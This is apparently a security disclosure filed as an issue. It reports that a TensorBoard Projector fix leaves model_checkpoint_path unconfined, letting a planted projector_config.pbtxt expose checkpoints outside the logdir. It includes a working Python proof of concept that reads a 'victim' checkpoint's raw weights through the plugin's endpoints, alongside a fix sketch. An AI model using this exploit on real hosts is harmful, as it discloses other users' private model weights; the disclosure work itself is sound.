[Security] Incomplete fix of #7115: projector model_checkpoint_path is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir #7119

@geo-chen

Reporting here as advised in https://issuetracker.google.com/issues/522459885

Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)

Summary

Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user-controlled asset paths in projector_config.pbtxt (metadata_path, tensor_path, bookmarks_path, and sprite.image_path) are resolved against, and confined to, the directory that contains projector_config.pbtxt. The fix did not cover a fifth user-controlled path in the same config file: model_checkpoint_path. That field is still passed straight to tf.train.load_checkpoint() with no confinement check. An attacker who can write or influence a projector_config.pbtxt under a scanned logdir (the exact threat model the #7115 fix addresses) can point model_checkpoint_path at any TensorFlow checkpoint elsewhere on the host. TensorBoard then enumerates that checkpoint's variables, advertises them in the served config, and returns their raw tensor bytes through the /data/plugin/projector/tensor route. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi-tenant TensorBoard deployment are the most sensitive assets present.

Details

The fix added _rel_to_abs_asset_path() (tensorboard/plugins/projector/projector_plugin.py:212), which resolves a candidate path and rejects it when it escapes the config directory:

def _rel_to_abs_asset_path(fpath, config_fpath):
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate

The four patched fields route through this function: tensor_path (lines 380 and 680), metadata_path (line 620), bookmarks_path (line 752), and sprite.image_path (line 801). Pointing any of those at a path outside the logdir now returns a clean 400.
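To make the helper's behaviour concrete, here is a minimal standalone sketch that copies the function quoted above and probes it with three paths. The is_confined() wrapper, the directory names, and the file names are hypothetical and exist only for this illustration; nothing here imports TensorBoard.

```python
import os
import tempfile


def _rel_to_abs_asset_path(fpath, config_fpath):
    # Copied from the helper quoted above, only reflowed for line length.
    config_dir = os.path.realpath(
        os.path.dirname(os.path.expanduser(config_fpath))
    )
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = (
        'Asset path "%s" resolves outside the config directory' % (fpath)
    )
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate


def is_confined(fpath, config_fpath):
    """Hypothetical wrapper: True if the helper accepts the path."""
    try:
        _rel_to_abs_asset_path(fpath, config_fpath)
        return True
    except ValueError:
        return False


# Throwaway layout: a logdir holding the config, plus a sibling directory.
work = tempfile.mkdtemp(prefix="tb_confine_")
logdir = os.path.join(work, "shared_logdir")
outside = os.path.join(work, "victim_private")
os.makedirs(logdir)
os.makedirs(outside)
config_fpath = os.path.join(logdir, "projector_config.pbtxt")

results = {
    # Relative path that stays next to the config: accepted.
    "relative_inside": is_confined("metadata.tsv", config_fpath),
    # Relative path that climbs out with "..": rejected.
    "dotdot_escape": is_confined("../victim_private/model.ckpt", config_fpath),
    # Absolute path outside the config directory: rejected.
    "absolute_outside": is_confined(
        os.path.join(outside, "model.ckpt"), config_fpath
    ),
}
print(results)
```

Because the helper calls os.path.realpath() before comparing, the paths do not need to exist for the check to run, which is why no files are created in the sketch.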

model_checkpoint_path does not. It is read from the attacker-controlled config in _read_latest_config_files() (text_format.Parse(file_content, config), line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in _get_reader_for_run():

# tensorboard/plugins/projector/projector_plugin.py
478    if (
479        config.model_checkpoint_path
480        and _using_tf()
481        and not tf.io.gfile.glob(config.model_checkpoint_path + "*")   # existence only
482    ):
...
498    if config.model_checkpoint_path and _using_tf():
499        try:
500            reader = tf.train.load_checkpoint(config.model_checkpoint_path)  # no confinement

There is no call to _rel_to_abs_asset_path(config.model_checkpoint_path, ...) anywhere, so the path is never confined to the config directory.
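One possible shape for the missing check is sketched below. This is not the upstream patch: resolve_checkpoint_path() and confine_to_config_dir() are hypothetical names, the latter is a stand-in written to mirror the semantics of _rel_to_abs_asset_path() so the example runs without TensorBoard, and treating an escaping path like a missing checkpoint is an assumption about the desired behaviour.

```python
import os


def confine_to_config_dir(fpath, config_fpath):
    """Stand-in mirroring the semantics of _rel_to_abs_asset_path()."""
    config_dir = os.path.realpath(
        os.path.dirname(os.path.expanduser(config_fpath))
    )
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    try:
        inside = os.path.commonpath([config_dir, candidate]) == config_dir
    except ValueError:
        # Raised, for example, when the paths are on different drives.
        inside = False
    if not inside:
        raise ValueError(
            'Asset path "%s" resolves outside the config directory' % fpath
        )
    return candidate


def resolve_checkpoint_path(model_checkpoint_path, config_fpath):
    """Hypothetical: return a confined checkpoint path, or None to skip it."""
    if not model_checkpoint_path:
        return None
    try:
        return confine_to_config_dir(model_checkpoint_path, config_fpath)
    except ValueError:
        # Assumption: an escaping path is handled like a missing checkpoint,
        # so the caller never hands it to the checkpoint reader.
        return None


# Intended call site (not executed here, shown only for orientation):
#   path = resolve_checkpoint_path(config.model_checkpoint_path, config_fpath)
#   if path and _using_tf():
#       reader = tf.train.load_checkpoint(path)
```

A check like this would change behaviour for any existing config that deliberately references a checkpoint outside its own directory, so whether to reject silently, log, or return an error is a decision for the maintainers.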

The readback is automatic and does not require the attacker to know any variable names. In _augment_configs_with_checkpoint_info() the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:

415    var_map = reader.get_variable_to_shape_map()
416    for tensor_name, tensor_shape in var_map.items():
417        if len(tensor_shape) != 2:
418            continue
...
425        embedding = config.embeddings.add()
426        embedding.tensor_name = tensor_name
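The effect of that loop can be sketched without TensorFlow by using a plain dict in place of the value returned by reader.get_variable_to_shape_map(). The variable names and shapes below are made up for illustration, and the sketch models only the rank check visible in the excerpt; the elided lines may apply further filters.

```python
def advertised_tensor_names(var_map):
    """Names that pass the rank-2 check in the excerpt above."""
    return [name for name, shape in var_map.items() if len(shape) == 2]


# Hypothetical shape map for a victim checkpoint (name -> shape).
var_map = {
    "embedding/weights": [10000, 128],  # 2D: advertised
    "dense/kernel": [128, 64],          # 2D: advertised
    "dense/bias": [64],                 # 1D: skipped
    "conv/kernel": [3, 3, 16, 32],      # 4D: skipped
}

print(advertised_tensor_names(var_map))
# → ['embedding/weights', 'dense/kernel']
```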

That augmented config is returned by /data/plugin/projector/config. The client then requests each tensor, and _serve_tensor() returns the raw bytes:

699    reader = self._get_reader_for_run(run)
...
709    tensor = reader.get_tensor(name)
...
719    data_bytes = tensor.tobytes()
720    return Respond(request, data_bytes, "application/octet-stream")

So the full chain is: the attacker plants a projector_config.pbtxt with model_checkpoint_path pointing outside the logdir, the config endpoint discloses the variable names and shapes of that out-of-logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and same config message, that #7115 set out to close for the other path fields.
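Turning the returned bytes back into a matrix needs only the shape advertised by the config endpoint. The sketch below uses the standard library so it runs without NumPy; it assumes float32 data in row-major order (the default layout of tobytes()) and the same byte order on both ends. decode_tensor() is a hypothetical helper, and the payload is built locally to stand in for an HTTP response body.

```python
from array import array


def decode_tensor(data_bytes, shape):
    """Rebuild a 2D list of floats from raw float32 bytes (row-major)."""
    rows, cols = shape
    flat = array("f")  # "f" is a C float, 4 bytes on common platforms
    flat.frombytes(data_bytes)
    if len(flat) != rows * cols:
        raise ValueError("byte length does not match the advertised shape")
    return [flat[r * cols:(r + 1) * cols].tolist() for r in range(rows)]


# Stand-in for the tensor endpoint's response body: six float32 values.
payload = array("f", [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]).tobytes()

print(decode_tensor(payload, (2, 3)))
# → [[1337.0, 7331.0, 4242.0], [9001.0, 1234.0, 5678.0]]
```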

The read is constrained to valid TensorFlow checkpoint files (a non-checkpoint path such as /etc/passwd fails load_checkpoint() and is caught), so this is not an arbitrary file read. In TensorBoard's own domain that constraint still exposes the highest-value data on the host: trained model weights from other users' runs.

PoC

This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious projector_config.pbtxt that points at it, and shows the weights coming back out of the tensor endpoint.

python3 -m venv tbvenv
./tbvenv/bin/pip install tensorflow-cpu werkzeug pillow grpcio-tools
# generate the plugin's protobuf modules in the checkout (run from the repo root):
./tbvenv/bin/python -m grpc_tools.protoc -I. --python_out=. $(find tensorboard -name '*.proto')
./tbvenv/bin/python poc_model_checkpoint_path.py

poc_model_checkpoint_path.py:

import os, sys, json, tempfile
import numpy as np
sys.path.insert(0, ".")  # use this checkout
import tensorflow as tf
from werkzeug.test import Client
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins import base_plugin

work = tempfile.mkdtemp(prefix="tb_poc_")

# Victim's PRIVATE checkpoint, OUTSIDE the shared logdir.
secret_dir = os.path.join(work, "victim_private", "secret_model")
os.makedirs(secret_dir)
SECRET = np.array([[1337.0, 7331.0, 4242.0],
                   [9001.0, 1234.0, 5678.0]], dtype=np.float32)
ckpt = tf.train.Checkpoint(stolen_weights=tf.Variable(SECRET, name="stolen_weights"))
prefix = ckpt.write(os.path.join(secret_dir, "model.ckpt"))

# Attacker controlled shared logdir: a malicious config that points outside it.
logdir = os.path.join(work, "shared_logdir")
os.makedirs(logdir)
with open(os.path.join(logdir, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "%s"\n' % prefix)
assert not os.path.realpath(prefix).startswith(os.path.realpath(logdir))

plugin = projector_plugin.ProjectorPlugin(
    base_plugin.TBContext(logdir=logdir, data_provider=None))

def get(handler, query):
    return Client(handler).get("/?" + query)

cfg = get(plugin._serve_config, "run=.").get_data(as_text=True)
name = json.loads(cfg)["embeddings"][0]["tensorName"]   # auto-discovered, no prior knowledge
data = get(plugin._serve_tensor, "run=.&name=%s" % name).get_data()
print("exfiltrated:", np.frombuffer(data, dtype=np.float32).tolist())
print("victim secret:", SECRET.flatten().tolist())

Observed output:

exfiltrated: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
victim secret: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]

For contrast, calling the patched helper with the same out-of-logdir path is rejected:

_rel_to_abs_asset_path("/.../victim_private/secret_model/model.ckpt", "/.../shared_logdir/projector_config.pbtxt")
-> ValueError: Asset path "..." resolves outside the config directory

confirming the other four fields are confined while model_checkpoint_path is not.

Impact

Information disclosure (CWE-22). An attacker who can write or influence a projector_config.pbtxt under a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi-tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so this is not an arbitrary read of any file type. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confining model_checkpoint_path to the config directory.
